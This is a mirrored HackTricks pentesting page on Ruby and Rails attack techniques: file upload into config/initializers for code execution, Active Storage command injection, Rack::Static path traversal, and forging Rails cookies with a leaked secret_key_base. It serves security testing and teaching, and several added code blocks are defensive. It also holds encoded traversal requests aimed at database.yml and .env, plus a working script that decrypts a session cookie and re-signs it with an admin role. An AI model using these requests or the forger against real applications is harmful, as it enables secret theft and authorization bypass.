mirror of https://github.com/HackTricks-wiki/hacktricks.git (synced 2025-10-10 18:36:50 +00:00)

# Ruby Tricks

{{#include ../../banners/hacktricks-training.md}}

## File upload to RCE

As explained in [this post](https://www.offsec.com/blog/cve-2024-46986/), uploading a `.rb` file into sensitive directories such as `config/initializers/` can lead to remote code execution (RCE) in Ruby on Rails applications: every `.rb` file under `config/initializers/` is loaded when the application boots, so a dropped file runs with the privileges of the app process the next time it starts.

Tips:

- Other boot/eager-load locations that are executed on app start are also risky when writeable (`config/initializers/` is the classic one; with `config.eager_load = true`, as in production, everything under `app/` is loaded too). If you find an arbitrary file upload that lands anywhere under `config/` and the file is later evaluated or `require`d, you may obtain RCE at boot.
- Look for dev/staging builds that copy user-controlled files into the container image where Rails will load them on boot.
- The usual root cause is an upload handler that joins a client-supplied directory or filename onto a storage path without confining the result, so a traversal such as `../../config/initializers/x.rb` escapes the media folder.

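The traversal-plus-extension combination described above, as an added example that is not code from the original page or from the post it cites: a naive upload-path helper that lets a media upload land in `config/initializers/`, beside a hardened version that confines the resolved path to the upload root and allowlists extensions. The directory layout, file names and `UnsafeUpload` error are constructed for this demo.

```ruby
# Added example: vulnerable vs. hardened upload-path handling (not Rails code).
require 'fileutils'
require 'tmpdir'

# --- vulnerable: trusts the client-supplied folder and filename as-is ---
def naive_upload_path(uploads_root, folder, filename)
  File.join(uploads_root, folder, filename)
end

# --- hardened: canonicalise, confine to uploads_root, allowlist extensions ---
ALLOWED_EXT = %w[.png .jpg .jpeg .gif .pdf].freeze   # assumption: what the app serves

class UnsafeUpload < StandardError; end

def safe_upload_path(uploads_root, folder, filename)
  root = File.expand_path(uploads_root)
  # Never trust the client's directory component of the filename; keep only the basename.
  base = File.basename(filename.to_s)
  raise UnsafeUpload, 'bad filename' if base.empty? || base.start_with?('.')
  raise UnsafeUpload, 'extension not allowed' unless ALLOWED_EXT.include?(File.extname(base).downcase)
  dest = File.expand_path(File.join(root, folder.to_s, base))
  # The resolved path must sit strictly below the upload root (prefix check ends with a separator
  # so that "/srv/app/public/media-evil" does not pass for root "/srv/app/public/media").
  raise UnsafeUpload, 'path escapes upload root' unless dest.start_with?(root + File::SEPARATOR)
  dest
end

# Simulate an app root with config/initializers and a public media directory (constructed).
def demo
  Dir.mktmpdir('rails-app') do |app_root|
    uploads      = File.join(app_root, 'public', 'media')
    initializers = File.join(app_root, 'config', 'initializers')
    FileUtils.mkdir_p(uploads)
    FileUtils.mkdir_p(initializers)

    folder = '../../config/initializers'   # attacker-controlled
    name   = 'zz_backdoor.rb'              # attacker-controlled

    # Vulnerable handler: the "upload" is written into the initializers directory.
    File.write(naive_upload_path(uploads, folder, name), "puts 'executed at boot'\n")
    landed = File.exist?(File.join(initializers, name))

    # Hardened handler: the same request is refused before anything is written.
    blocked = begin
      safe_upload_path(uploads, folder, name)
      false
    rescue UnsafeUpload
      true
    end

    { landed_in_initializers: landed, hardened_blocked: blocked }
  end
end

puts demo.inspect if __FILE__ == $0
```

The extension allowlist is a name check only; a production handler should also validate the file content (magic bytes) and store uploads outside the application root, or in object storage, so that nothing the client controls is ever on Ruby's load path.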
## Active Storage image transformation → command execution (CVE-2025-24293)

When an application uses Active Storage with `image_processing` + `mini_magick` and passes untrusted parameters to image transformation methods, Rails versions prior to 7.1.5.2 / 7.2.2.2 / 8.0.2.1 could allow command injection, because some transformation methods were mistakenly allowed by default and their arguments end up on the ImageMagick command line.

- A vulnerable pattern looks like:
```erb
<%= image_tag blob.variant(params[:t] => params[:v]) %>
```
where `params[:t]` and/or `params[:v]` are attacker-controlled: the key is the name of the transformation method invoked on the `image_processing` pipeline and the value is its argument.

- What to try during testing
  - Identify any endpoints that accept variant/processing options, transformation names, or arbitrary ImageMagick arguments.
  - Fuzz `params[:t]` and `params[:v]` for suspicious errors or execution side-effects (timing differences, out-of-band DNS/HTTP callbacks). If you can influence the method name or pass raw arguments that reach MiniMagick, you may get code execution on the host that runs the image processing, which is often a background job worker rather than the web server.
  - If you only have read access to generated variants, attempt blind exfiltration via crafted ImageMagick operations.

- Remediation/detection
  - If you see Rails < 7.1.5.2 / 7.2.2.2 / 8.0.2.1 with Active Storage + `image_processing` + `mini_magick` and user-controlled transformations, consider it exploitable. Recommend upgrading, enforcing a strict allowlist of transformation names and argument shapes (never let the client choose the method name), and a hardened ImageMagick `policy.xml` that disables coders the app does not need (e.g. `MVG`, `MSL`, `TEXT`, `URL`, `HTTPS`).

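The allowlist recommended in the remediation bullet, as an added example that is not code from the original page or from Rails: a helper that validates `params[:t]` and `params[:v]` before they are handed to `blob.variant`, so the client can only select from known transformation methods with a bounded `WxH` geometry. The allowed method names, the dimension bound and the `UnsupportedTransformation` error are assumptions for this demo; there is no Rails dependency so it runs stand-alone.

```ruby
# Added example: allowlisting variant transformations instead of passing params through.
class UnsupportedTransformation < StandardError; end

# Only these transformation methods may reach image_processing. Anything else,
# including raw ImageMagick options that MiniMagick would otherwise accept, is
# rejected before it touches the pipeline. (Assumed set for this demo.)
ALLOWED_METHODS = %w[resize_to_limit resize_to_fill].freeze
MAX_DIMENSION   = 2000

# Parse "WxH" into two bounded integers; reject anything that is not exactly that shape.
def parse_geometry(value)
  m = /\A(\d{1,4})x(\d{1,4})\z/.match(value.to_s)
  raise UnsupportedTransformation, "bad geometry #{value.inspect}" unless m
  w, h = m[1].to_i, m[2].to_i
  unless (1..MAX_DIMENSION).cover?(w) && (1..MAX_DIMENSION).cover?(h)
    raise UnsupportedTransformation, 'geometry out of range'
  end
  [w, h]
end

# Build the transformation hash for blob.variant(...), e.g. { "resize_to_limit" => [800, 600] }.
def safe_variant_options(t, v)
  method = t.to_s
  unless ALLOWED_METHODS.include?(method)
    raise UnsupportedTransformation, "method #{method.inspect} not allowed"
  end
  { method => parse_geometry(v) }
end

# Controller-friendly variant: fall back to a fixed preset rather than erroring out.
def variant_options_or_default(t, v, default: { 'resize_to_limit' => [800, 800] })
  safe_variant_options(t, v)
rescue UnsupportedTransformation
  default
end

if __FILE__ == $0
  # Constructed inputs: one legitimate request and two that must be refused.
  [['resize_to_limit', '800x600'],
   ['loader', 'foo'],
   ['resize_to_fill', '800x600;touch /tmp/x']].each do |t, v|
    puts "#{t.inspect} => #{v.inspect}: #{variant_options_or_default(t, v).inspect}"
  end
end
```

In a controller this becomes `blob.variant(safe_variant_options(params[:t], params[:v]))`; the point is that the method name never comes from the request, only a choice among methods the app already decided are safe.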
## Rack::Static LFI / path traversal (CVE-2025-27610)

If the target stack uses Rack middleware directly or via a framework, versions of `rack` prior to 2.2.13, 3.0.14, and 3.1.12 allow Local File Inclusion via `Rack::Static` when `:root` is unset or misconfigured. Encoded traversal sequences in `PATH_INFO` can expose files under the process working directory (what `Rack::Static` falls back to when `:root` is not given) or under another unexpected root.

- Hunt for apps that mount `Rack::Static` in `config.ru` or in their middleware stacks. Try encoded traversals against the static paths, for example:
```text
GET /assets/%2e%2e/%2e%2e/config/database.yml
GET /favicon.ico/..%2f..%2f.env
```
Adjust the prefix to match the configured `urls:`. If the app responds with file contents, you likely have LFI to anything under the resolved `:root`.

- Mitigation: upgrade Rack; always set `:root` explicitly and point it only at a directory that contains public files.

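Why the encoded traversal above works against a careless static handler, as an added example that is not code from the original page or from the `rack` gem: a stand-alone resolver that percent-decodes `PATH_INFO` once, joins it to the static root, canonicalises the result and refuses anything that leaves the root. The root directory, the `urls:` prefixes and the request list are constructed for this demo; the two traversal requests are the ones shown above.

```ruby
# Added example: confining a decoded PATH_INFO to the static root (not Rack::Static's code).

# Percent-decode exactly once, as a server does before touching the filesystem.
def percent_decode(str)
  str.gsub(/%([0-9A-Fa-f]{2})/) { $1.hex.chr }
end

# Return the absolute file path to serve, or nil if the request must be refused.
# `root` is the directory :root should point at; `urls` are the served URL prefixes.
def resolve_static(root, urls, path_info)
  root    = File.expand_path(root)
  decoded = percent_decode(path_info)
  return nil unless urls.any? { |u| decoded.start_with?(u) }
  return nil if decoded.include?("\0")
  candidate = File.expand_path(File.join(root, decoded))
  # Confinement: the canonical path must sit strictly below root. expand_path resolves
  # the "../" produced by decoding %2e%2e or %2f, which is exactly what a prefix check
  # on the raw, still-encoded string would miss.
  candidate.start_with?(root + File::SEPARATOR) ? candidate : nil
end

# Classify a batch of requests: path to serve, or nil for refused.
def triage(root, urls, requests)
  requests.to_h { |req| [req, resolve_static(root, urls, req)] }
end

if __FILE__ == $0
  # Constructed sample requests: one benign, plus the two traversals from the page.
  requests = [
    '/assets/app.css',
    '/assets/%2e%2e/%2e%2e/config/database.yml',
    '/favicon.ico/..%2f..%2f.env'
  ]
  triage('/srv/app/public', %w[/assets /favicon.ico], requests).each do |req, path|
    puts format('%-45s -> %s', req, path || 'REFUSED')
  end
end
```

When reviewing a `config.ru`, the check is the same one in prose: the directory `:root` resolves to must be one you would be happy to serve in full, because everything below it, not just the listed `urls:`, is reachable once canonicalisation is wrong.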
## Forging/decrypting Rails cookies when `secret_key_base` is leaked

Rails encrypts and signs cookies using keys derived from `secret_key_base`. If that value leaks (e.g., in a repo, in logs, in a misconfigured `SECRET_KEY_BASE` environment variable, or through `credentials.yml.enc` shipped together with its `master.key`), you can usually decrypt, modify, and re-encrypt cookies. This often leads to an authorization bypass if the app stores roles, user IDs, or feature flags in cookies; the cookie-store session itself is just another encrypted cookie.

Minimal Ruby to decrypt and re-encrypt modern cookies (AES-256-GCM, the default in recent Rails):
```ruby
require 'cgi'
require 'json'
require 'openssl'
require 'active_support'
require 'active_support/message_encryptor'
require 'active_support/key_generator'

# Usage: SECRET_KEY_BASE_LEAKED=... ruby forge.rb '<url-encoded cookie value>' [cookie_name]
secret_key_base = ENV.fetch('SECRET_KEY_BASE_LEAKED')
raw_cookie      = CGI.unescape(ARGV[0])
cookie_name     = ARGV[1] || '_app_session'

salt    = 'authenticated encrypted cookie'
cipher  = 'aes-256-gcm'
key_len = ActiveSupport::MessageEncryptor.key_len(cipher)
# Apps on `load_defaults 7.0` or later derive keys with SHA256; older apps use SHA1.
digest  = ENV['OLD_DIGEST'] ? OpenSSL::Digest::SHA1 : OpenSSL::Digest::SHA256
secret  = ActiveSupport::KeyGenerator.new(secret_key_base, iterations: 1000, hash_digest_class: digest)
                                    .generate_key(salt, key_len)
enc     = ActiveSupport::MessageEncryptor.new(secret, cipher: cipher, serializer: JSON)

# Rails 6+ binds every cookie to the purpose "cookie.<name>"; a mismatch raises InvalidMessage.
# Set NO_PURPOSE=1 for pre-6.0 apps (or apps with use_cookies_with_metadata disabled).
purpose = ENV['NO_PURPOSE'] ? nil : "cookie.#{cookie_name}"

plain = enc.decrypt_and_verify(raw_cookie, purpose: purpose)
puts "Decrypted: #{plain.inspect}"

# Modify and re-encrypt (example: escalate role); the same purpose must be attached again
plain['role'] = 'admin' if plain.is_a?(Hash)
forged = enc.encrypt_and_sign(plain, purpose: purpose)
puts "Forged cookie: #{CGI.escape(forged)}"
```
Notes:
- Older apps may use AES-256-CBC with the salts `encrypted cookie` / `signed encrypted cookie`, or the Marshal serializer instead of JSON. Adjust the salts, cipher, and serializer accordingly.
- The `hash_digest_class:` option on `KeyGenerator` exists from Active Support 7.0; with an older gem, drop it (SHA1 is then the only behaviour anyway).
- An `ActiveSupport::MessageEncryptor::InvalidMessage` error with a correct key usually means a wrong purpose, digest, or serializer, not a wrong `secret_key_base`; try the combinations above before discarding a candidate secret.
- In case of a compromise or after an assessment, rotate `secret_key_base` to invalidate all existing cookies and every other signed or encrypted token derived from it.

## See also (Ruby/Rails-specific vulnerabilities)

- Ruby deserialization and class pollution:
{{#ref}}
../../pentesting-web/deserialization/README.md
{{#endref}}
{{#ref}}
../../pentesting-web/deserialization/ruby-class-pollution.md
{{#endref}}
{{#ref}}
../../pentesting-web/deserialization/ruby-_json-pollution.md
{{#endref}}
- Template injection in Ruby engines (ERB/Haml/Slim, etc.):
{{#ref}}
../../pentesting-web/ssti-server-side-template-injection/README.md
{{#endref}}

## References

- Rails Security Announcement: CVE-2025-24293 Active Storage unsafe transformation methods (fixed in 7.1.5.2 / 7.2.2.2 / 8.0.2.1). https://discuss.rubyonrails.org/t/cve-2025-24293-active-storage-allowed-transformation-methods-potentially-unsafe/89670
- GitHub Advisory: Rack::Static Local File Inclusion (CVE-2025-27610). https://github.com/advisories/GHSA-7wqh-767x-r66v
- OffSec: CVE-2024-46986, file upload to RCE via `config/initializers/`. https://www.offsec.com/blog/cve-2024-46986/

{{#include ../../banners/hacktricks-training.md}}